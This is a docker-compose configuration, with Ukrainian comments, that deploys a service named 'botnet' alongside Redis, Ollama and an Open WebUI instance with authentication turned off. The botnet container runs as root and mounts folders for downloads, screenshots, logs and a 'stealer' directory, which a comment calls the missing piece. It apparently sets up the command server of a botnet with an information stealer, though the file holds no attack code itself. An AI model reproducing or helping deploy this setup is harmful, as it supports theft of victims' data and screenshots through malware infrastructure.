version: '3.8'

services:
  redis:
    image: redis:7-alpine
    restart: unless-stopped

  botnet:
    build: ./botnet
    ports:
      - "8000:8000"
    depends_on:
      - redis
    environment:
      - REDIS_URL=redis://redis:6379/0
    # Додаємо права рута, щоб докер міг писати на диск VPS
    user: "0:0"
    volumes:
      - ./downloads:/app/downloads
      - ./screenshots:/app/screenshots
      - ./logs:/app/logs
      - ./stealer:/app/stealer  # ОСЬ ЦЬОГО НЕ ВИСТАЧАЛО
    restart: unless-stopped

  ollama:
    image: ollama/ollama:latest
    ports:
      - "11434:11434"
    volumes:
      - ollama_data:/root/.ollama
    restart: unless-stopped

  open-webui:
    image: ghcr.io/open-webui/open-webui:main
    ports:
      - "3001:8080"
    volumes:
      - open-webui:/app/backend/data
    environment:
      - OLLAMA_BASE_URL=http://ollama:11434
      - WEBUI_AUTH=false
    depends_on:
      - ollama
    restart: unless-stopped

volumes:
  ollama_data:
  open-webui:

